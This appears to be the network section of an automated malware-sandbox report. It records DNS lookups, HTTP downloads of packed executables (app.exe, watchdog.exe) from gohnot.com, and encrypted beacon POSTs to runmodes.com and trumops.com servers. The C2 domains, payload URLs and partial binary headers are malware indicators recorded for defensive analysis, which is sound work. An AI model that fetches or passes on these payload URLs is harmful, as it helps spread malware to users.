                                                                                                  Nov 4, 2021 13:13:28.847537994 CET5710653192.168.2.38.8.8.8
                                                                                                  Nov 4, 2021 13:13:28.868427038 CET53571068.8.8.8192.168.2.3
                                                                                                  Nov 4, 2021 13:13:28.992549896 CET6035253192.168.2.38.8.8.8
                                                                                                  Nov 4, 2021 13:13:29.014751911 CET53603528.8.8.8192.168.2.3
                                                                                                  Nov 4, 2021 13:13:31.363845110 CET5539353192.168.2.38.8.8.8
                                                                                                  Nov 4, 2021 13:13:31.386565924 CET53553938.8.8.8192.168.2.3
                                                                                                  Nov 4, 2021 13:13:37.962714911 CET5510853192.168.2.38.8.8.8
                                                                                                  Nov 4, 2021 13:13:37.981930971 CET53551088.8.8.8192.168.2.3
                                                                                                  Nov 4, 2021 13:14:04.148565054 CET6443253192.168.2.38.8.8.8
                                                                                                  Nov 4, 2021 13:14:04.171608925 CET53644328.8.8.8192.168.2.3

                                                                                                  DNS Queries

                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                  Nov 4, 2021 13:12:36.531829119 CET192.168.2.38.8.8.80xb82aStandard query (0)runmodes.comA (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 13:12:36.693613052 CET192.168.2.38.8.8.80x3507Standard query (0)runmodes.comA (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 13:12:36.835752010 CET192.168.2.38.8.8.80xde8fStandard query (0)runmodes.comA (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 13:12:36.984076023 CET192.168.2.38.8.8.80x3676Standard query (0)runmodes.comA (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 13:12:37.214611053 CET192.168.2.38.8.8.80x4dddStandard query (0)trumops.com16IN (0x0001)
                                                                                                  Nov 4, 2021 13:12:37.248415947 CET192.168.2.38.8.8.80x22d2Standard query (0)server16.trumops.comA (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 13:12:38.957103968 CET192.168.2.38.8.8.80xbc27Standard query (0)gohnot.comA (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 13:12:40.144921064 CET192.168.2.38.8.8.80x3562Standard query (0)runmodes.comA (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 13:12:43.418806076 CET192.168.2.38.8.8.80x178eStandard query (0)runmodes.comA (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:06.565668106 CET192.168.2.38.8.8.80xf797Standard query (0)trumops.com16IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:06.593276024 CET192.168.2.38.8.8.80xf41eStandard query (0)logs.trumops.com16IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:06.621603012 CET192.168.2.38.8.8.80xf287Standard query (0)442b90d2-fde4-485f-a003-6086e2191d6e.uuid.trumops.com16IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:06.713522911 CET192.168.2.38.8.8.80xb9c3Standard query (0)runmodes.comA (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:06.818048954 CET192.168.2.38.8.8.80x65b0Standard query (0)server2.trumops.comA (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:15.786428928 CET192.168.2.38.8.8.80xc8f1Standard query (0)server2.trumops.comA (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:16.257272959 CET192.168.2.38.8.8.80xae69Standard query (0)runmodes.comA (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:28.847537994 CET192.168.2.38.8.8.80x3644Standard query (0)server2.trumops.comA (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:28.992549896 CET192.168.2.38.8.8.80xc23aStandard query (0)gohnot.comA (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:31.363845110 CET192.168.2.38.8.8.80xe7aaStandard query (0)e0a50c60a85bfbb9ecf45bff0239aaa3.hash.trumops.com16IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:37.962714911 CET192.168.2.38.8.8.80xa88fStandard query (0)runmodes.comA (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 13:14:04.148565054 CET192.168.2.38.8.8.80xc84cStandard query (0)server2.trumops.comA (IP address)IN (0x0001)

                                                                                                  DNS Answers

                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                  Nov 4, 2021 13:12:36.551266909 CET8.8.8.8192.168.2.30xb82aNo error (0)runmodes.com172.67.207.136A (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 13:12:36.551266909 CET8.8.8.8192.168.2.30xb82aNo error (0)runmodes.com104.21.34.203A (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 13:12:36.713059902 CET8.8.8.8192.168.2.30x3507No error (0)runmodes.com172.67.207.136A (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 13:12:36.713059902 CET8.8.8.8192.168.2.30x3507No error (0)runmodes.com104.21.34.203A (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 13:12:36.859380960 CET8.8.8.8192.168.2.30xde8fNo error (0)runmodes.com172.67.207.136A (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 13:12:36.859380960 CET8.8.8.8192.168.2.30xde8fNo error (0)runmodes.com104.21.34.203A (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 13:12:37.009023905 CET8.8.8.8192.168.2.30x3676No error (0)runmodes.com172.67.207.136A (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 13:12:37.009023905 CET8.8.8.8192.168.2.30x3676No error (0)runmodes.com104.21.34.203A (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 13:12:37.239144087 CET8.8.8.8192.168.2.30x4dddNo error (0)trumops.comTXT (Text strings)IN (0x0001)
                                                                                                  Nov 4, 2021 13:12:37.270955086 CET8.8.8.8192.168.2.30x22d2No error (0)server16.trumops.com172.67.139.144A (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 13:12:37.270955086 CET8.8.8.8192.168.2.30x22d2No error (0)server16.trumops.com104.21.79.9A (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 13:12:38.978027105 CET8.8.8.8192.168.2.30xbc27No error (0)gohnot.com104.21.92.165A (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 13:12:38.978027105 CET8.8.8.8192.168.2.30xbc27No error (0)gohnot.com172.67.196.11A (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 13:12:40.164143085 CET8.8.8.8192.168.2.30x3562No error (0)runmodes.com172.67.207.136A (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 13:12:40.164143085 CET8.8.8.8192.168.2.30x3562No error (0)runmodes.com104.21.34.203A (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 13:12:43.438608885 CET8.8.8.8192.168.2.30x178eNo error (0)runmodes.com172.67.207.136A (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 13:12:43.438608885 CET8.8.8.8192.168.2.30x178eNo error (0)runmodes.com104.21.34.203A (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:06.588268995 CET8.8.8.8192.168.2.30xf797No error (0)trumops.comTXT (Text strings)IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:06.616501093 CET8.8.8.8192.168.2.30xf41eNo error (0)logs.trumops.comTXT (Text strings)IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:06.643345118 CET8.8.8.8192.168.2.30xf287Name error (3)442b90d2-fde4-485f-a003-6086e2191d6e.uuid.trumops.comnonenone16IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:06.734728098 CET8.8.8.8192.168.2.30xb9c3No error (0)runmodes.com172.67.207.136A (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:06.734728098 CET8.8.8.8192.168.2.30xb9c3No error (0)runmodes.com104.21.34.203A (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:06.840814114 CET8.8.8.8192.168.2.30x65b0No error (0)server2.trumops.com104.21.79.9A (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:06.840814114 CET8.8.8.8192.168.2.30x65b0No error (0)server2.trumops.com172.67.139.144A (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:15.811979055 CET8.8.8.8192.168.2.30xc8f1No error (0)server2.trumops.com172.67.139.144A (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:15.811979055 CET8.8.8.8192.168.2.30xc8f1No error (0)server2.trumops.com104.21.79.9A (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:16.277537107 CET8.8.8.8192.168.2.30xae69No error (0)runmodes.com172.67.207.136A (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:16.277537107 CET8.8.8.8192.168.2.30xae69No error (0)runmodes.com104.21.34.203A (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:28.868427038 CET8.8.8.8192.168.2.30x3644No error (0)server2.trumops.com104.21.79.9A (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:28.868427038 CET8.8.8.8192.168.2.30x3644No error (0)server2.trumops.com172.67.139.144A (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:29.014751911 CET8.8.8.8192.168.2.30xc23aNo error (0)gohnot.com104.21.92.165A (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:29.014751911 CET8.8.8.8192.168.2.30xc23aNo error (0)gohnot.com172.67.196.11A (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:31.386565924 CET8.8.8.8192.168.2.30xe7aaNo error (0)e0a50c60a85bfbb9ecf45bff0239aaa3.hash.trumops.comTXT (Text strings)IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:37.981930971 CET8.8.8.8192.168.2.30xa88fNo error (0)runmodes.com172.67.207.136A (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:37.981930971 CET8.8.8.8192.168.2.30xa88fNo error (0)runmodes.com104.21.34.203A (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 13:14:04.171608925 CET8.8.8.8192.168.2.30xc84cNo error (0)server2.trumops.com104.21.79.9A (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 13:14:04.171608925 CET8.8.8.8192.168.2.30xc84cNo error (0)server2.trumops.com172.67.139.144A (IP address)IN (0x0001)

                                                                                                  HTTP Request Dependency Graph

                                                                                                  • runmodes.com
                                                                                                  • server16.trumops.com
                                                                                                  • server2.trumops.com
                                                                                                  • gohnot.com

                                                                                                  HTTP Packets

                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  0192.168.2.349749172.67.207.136443C:\Users\user\Desktop\0NlSa5bf55.exe
                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  1192.168.2.349750172.67.207.136443C:\Users\user\Desktop\0NlSa5bf55.exe
                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  10192.168.2.349762172.67.207.136443C:\Users\user\Desktop\0NlSa5bf55.exe
                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  11192.168.2.349765104.21.79.9443C:\Windows\rss\csrss.exe
                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  12192.168.2.349802172.67.207.136443C:\Users\user\Desktop\0NlSa5bf55.exe
                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  13192.168.2.349831104.21.79.9443C:\Windows\rss\csrss.exe
                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  14192.168.2.349754104.21.92.16580C:\Users\user\Desktop\0NlSa5bf55.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  Nov 4, 2021 13:12:38.997127056 CET1079OUTGET /d28daa3fb329cff58b19acdf478b7882/app.exe HTTP/1.1
                                                                                                  Host: gohnot.com
                                                                                                  User-Agent: Go-http-client/1.1
                                                                                                  Uuid:
                                                                                                  Accept-Encoding: gzip
                                                                                                  Nov 4, 2021 13:12:39.026179075 CET1080INHTTP/1.1 200 OK
                                                                                                  Date: Thu, 04 Nov 2021 12:12:39 GMT
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Length: 3788288
                                                                                                  Connection: keep-alive
                                                                                                  content-disposition: attachment; filename=app.exe
                                                                                                  etag: "616ea4c2-39ce00"
                                                                                                  last-modified: Tue, 19 Oct 2021 10:58:10 GMT
                                                                                                  Cache-Control: max-age=3600
                                                                                                  CF-Cache-Status: HIT
                                                                                                  Age: 726
                                                                                                  Accept-Ranges: bytes
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=aGUDRkZW12WFb0Z1WtbDazJRsyQjmf37XuogvaYwPWl6MnjPMl4eqYDp2G4rixUdVCHSJNAij3d%2BJyafZy7nG%2FpPEkNqHIpND7MIWu%2Fkz1fTe%2FgV6DrKP1Wv8esq"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Vary: Accept-Encoding
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 6a8dc077cd066933-FRA
                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                  Data Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 00 00 00 00 00 24 8a 00 00 00 00 00 e0 00 03 03 0b 01 03 00 00 d0 39 00 00 10 00 00 00 30 52 00 20 08 8c 00 00 40 52 00 00 10 8c 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 20 8c 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 10 8c 00 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 30 52 00 00 10 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 d0 39 00 00 40 52 00 00 ca 39 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 55 50 58 32 00 00 00 00 00 10 00 00 00 10 8c 00 00 02 00 00 00 cc 39 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0
                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL$90R @R@ UPX00RUPX19@R9@UPX29@


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  15192.168.2.349767104.21.92.16580C:\Users\user\Desktop\0NlSa5bf55.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  Nov 4, 2021 13:13:29.038016081 CET5537OUTGET /d28daa3fb329cff58b19acdf478b7882/watchdog.exe HTTP/1.1
                                                                                                  Host: gohnot.com
                                                                                                  User-Agent: Go-http-client/1.1
                                                                                                  Uuid: 442b90d2-fde4-485f-a003-6086e2191d6e
                                                                                                  Version: 183
                                                                                                  Accept-Encoding: gzip
                                                                                                  Nov 4, 2021 13:13:29.097462893 CET5542INHTTP/1.1 200 OK
                                                                                                  Date: Thu, 04 Nov 2021 12:13:29 GMT
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Length: 2102272
                                                                                                  Connection: keep-alive
                                                                                                  content-disposition: attachment; filename=watchdog.exe
                                                                                                  etag: "616ea494-201400"
                                                                                                  last-modified: Tue, 19 Oct 2021 10:57:24 GMT
                                                                                                  Cache-Control: max-age=3600
                                                                                                  CF-Cache-Status: HIT
                                                                                                  Age: 802
                                                                                                  Accept-Ranges: bytes
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yf%2BGD8l7373ZeZ%2Bx2Q1xpl%2FgZXFhtKWeXRYuOa7bn%2FvVZo559VS4xe2flpcsnosSzS0Rx9wZavPEonRFgpdfi6r8EDDYvPMTxUa18GxPfvjXzcqZC%2B2iZbRyMbg4"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Vary: Accept-Encoding
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 6a8dc1b08ff06913-FRA
                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                  Data Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 00 00 00 00 00 b4 4b 00 00 00 00 00 e0 00 03 03 0b 01 03 00 00 10 20 00 00 10 00 00 00 70 2d 00 00 8d 4d 00 00 80 2d 00 00 90 4d 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 a0 4d 00 00 10 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 90 4d 00 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 70 2d 00 00 10 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 10 20 00 00 80 2d 00 00 10 20 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 55 50 58 32 00 00 00 00 00 10 00 00 00 90 4d 00 00 02 00 00 00 12 20 00 00 00 00 00 00 00 00 00 00
                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELK p-M-M@MMUPX0p-UPX1 - @UPX2M


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  2192.168.2.349751172.67.207.136443C:\Users\user\Desktop\0NlSa5bf55.exe
                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  3192.168.2.349752172.67.207.136443C:\Users\user\Desktop\0NlSa5bf55.exe
                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  4192.168.2.349753172.67.139.144443C:\Users\user\Desktop\0NlSa5bf55.exe
                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  5192.168.2.349755172.67.207.136443C:\Users\user\Desktop\0NlSa5bf55.exe
                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  6192.168.2.349756172.67.207.136443C:\Users\user\Desktop\0NlSa5bf55.exe
                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  7192.168.2.349759172.67.207.136443C:\Users\user\Desktop\0NlSa5bf55.exe
                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  8192.168.2.349760104.21.79.9443C:\Windows\rss\csrss.exe
                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  9192.168.2.349761172.67.139.144443C:\Users\user\Desktop\0NlSa5bf55.exe
                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                  HTTPS Proxied Packets

                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  0192.168.2.349749172.67.207.136443C:\Users\user\Desktop\0NlSa5bf55.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2021-11-04 12:12:36 UTC0OUTPOST /api/log HTTP/1.1
                                                                                                  Host: runmodes.com
                                                                                                  User-Agent: Go-http-client/1.1
                                                                                                  Content-Length: 192
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Accept-Encoding: gzip
                                                                                                  2021-11-04 12:12:36 UTC0OUTData Raw: 54 78 49 43 33 6a 65 6d 33 31 6f 44 65 4c 42 63 61 70 47 58 51 58 4e 56 6b 43 31 2b 6f 6e 52 58 72 31 4a 61 30 2b 51 64 62 57 57 34 4d 4e 32 71 72 54 57 37 49 63 38 4a 59 79 50 50 37 52 2f 32 6f 74 71 76 2f 6c 49 36 55 47 6b 6b 47 74 2b 50 62 74 47 71 68 4b 52 79 47 71 6a 77 5a 66 37 2f 78 45 78 7a 7a 44 78 52 76 33 4f 54 38 44 59 2b 73 55 49 74 2f 51 4f 4a 34 54 70 54 6a 6a 6b 32 62 4d 32 69 34 63 52 65 46 71 4d 72 67 58 2b 45 57 35 70 6e 42 41 75 4b 47 4a 79 2b 6f 61 67 49 36 42 70 76 4a 67 4e 43 74 4c 67 6f 75 42 58 53 6d 79 7a 59 67 4b 78 65 4d 55 62 6d 65 41 3d 3d
                                                                                                  Data Ascii: TxIC3jem31oDeLBcapGXQXNVkC1+onRXr1Ja0+QdbWW4MN2qrTW7Ic8JYyPP7R/2otqv/lI6UGkkGt+PbtGqhKRyGqjwZf7/xExzzDxRv3OT8DY+sUIt/QOJ4TpTjjk2bM2i4cReFqMrgX+EW5pnBAuKGJy+oagI6BpvJgNCtLgouBXSmyzYgKxeMUbmeA==
                                                                                                  2021-11-04 12:12:36 UTC0INHTTP/1.1 200 OK
                                                                                                  Date: Thu, 04 Nov 2021 12:12:36 GMT
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qhX8wR370PslmQXquhv39Sv5LSwdUlU9nUqje2rkW8YlsEqvOX9XgDucMAxEfC7PY1ND0OhaN1KL8CyOfQpASgW76S6WwqCPFyyjzanxRtrTgTK9jq1ZI7molXDeDsY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 6a8dc068e97e5c38-FRA
                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  1192.168.2.349750172.67.207.136443C:\Users\user\Desktop\0NlSa5bf55.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2021-11-04 12:12:36 UTC1OUTPOST /api/log HTTP/1.1
                                                                                                  Host: runmodes.com
                                                                                                  User-Agent: Go-http-client/1.1
                                                                                                  Content-Length: 160
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Accept-Encoding: gzip
                                                                                                  2021-11-04 12:12:36 UTC1OUTData Raw: 51 4f 69 79 38 46 2f 54 6d 64 74 50 35 62 38 50 58 76 64 6c 47 68 34 55 38 57 63 6c 70 4e 76 39 54 78 31 54 38 2b 63 75 58 34 57 6f 6b 65 43 61 4c 5a 2f 47 5a 6d 6a 56 70 74 36 47 4f 65 58 76 50 37 7a 43 45 66 75 54 71 42 76 35 78 34 45 4c 44 7a 78 4a 7a 78 37 50 4f 75 78 59 77 6b 72 67 70 59 57 38 69 50 35 6d 30 77 7a 51 42 47 76 33 66 76 48 4c 6b 6c 65 48 4c 6b 2b 33 6d 5a 6d 4c 42 63 52 75 75 6c 4a 45 74 54 55 6a 6b 55 75 38 74 38 64 30 41 6d 68 35 62 36 4b 56 73 41 3d 3d
                                                                                                  Data Ascii: QOiy8F/TmdtP5b8PXvdlGh4U8WclpNv9Tx1T8+cuX4WokeCaLZ/GZmjVpt6GOeXvP7zCEfuTqBv5x4ELDzxJzx7POuxYwkrgpYW8iP5m0wzQBGv3fvHLkleHLk+3mZmLBcRuulJEtTUjkUu8t8d0Amh5b6KVsA==
                                                                                                  2021-11-04 12:12:36 UTC1INHTTP/1.1 200 OK
                                                                                                  Date: Thu, 04 Nov 2021 12:12:36 GMT
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Gtznp3GukB8jHlP3ZiFMylTeJpzrhl%2BJ12U9ChkEaySrJ2wPrBK5ercfk%2F4NuE9KvsRYYfksPhIXAI%2BzbhWfuyzofB33gpLrW6ezcoBdKehrrtDGU%2BsosyXwd7fE%2BDE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 6a8dc069ee8a68e9-FRA
                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  10192.168.2.349762172.67.207.136443C:\Users\user\Desktop\0NlSa5bf55.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2021-11-04 12:13:16 UTC31OUTPOST /api/log HTTP/1.1
                                                                                                  Host: runmodes.com
                                                                                                  User-Agent: Go-http-client/1.1
                                                                                                  Content-Length: 132
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Accept-Encoding: gzip
                                                                                                  2021-11-04 12:13:16 UTC31OUTData Raw: 2f 6b 62 72 65 35 48 6e 6d 42 42 6e 59 2f 52 41 2f 78 4e 4e 6d 6e 72 68 6d 31 44 59 4f 36 41 38 7a 4c 72 4c 34 6e 49 37 55 39 6d 4c 4e 2f 2f 4a 44 4d 61 6c 41 46 34 75 46 43 4a 38 59 68 69 4c 33 62 2f 47 39 64 45 32 4f 32 49 45 47 35 31 31 4a 44 43 69 58 70 44 43 47 4b 75 67 78 77 67 7a 4c 4b 58 54 32 6c 4f 42 38 62 4a 70 53 36 70 35 57 65 48 7a 6d 55 6d 5a 44 33 66 2b 4c 4d 78 5a 6d 77 3d 3d
                                                                                                  Data Ascii: /kbre5HnmBBnY/RA/xNNmnrhm1DYO6A8zLrL4nI7U9mLN//JDMalAF4uFCJ8YhiL3b/G9dE2O2IEG511JDCiXpDCGKugxwgzLKXT2lOB8bJpS6p5WeHzmUmZD3f+LMxZmw==
                                                                                                  2021-11-04 12:13:16 UTC31INHTTP/1.1 200 OK
                                                                                                  Date: Thu, 04 Nov 2021 12:13:16 GMT
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eFlHTIFYWHXdcPPlTu0qH5d5xDX1fG2WhjjxxsU1RClqWIPfeGw%2BSqSuu5UeJoVB7bANX%2Fc5K5eFYpWwpCDM7sOMff48jsYhQnFZb9knRIh85lqyntRIFjXWTGBBHBM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 6a8dc16138605cb0-FRA
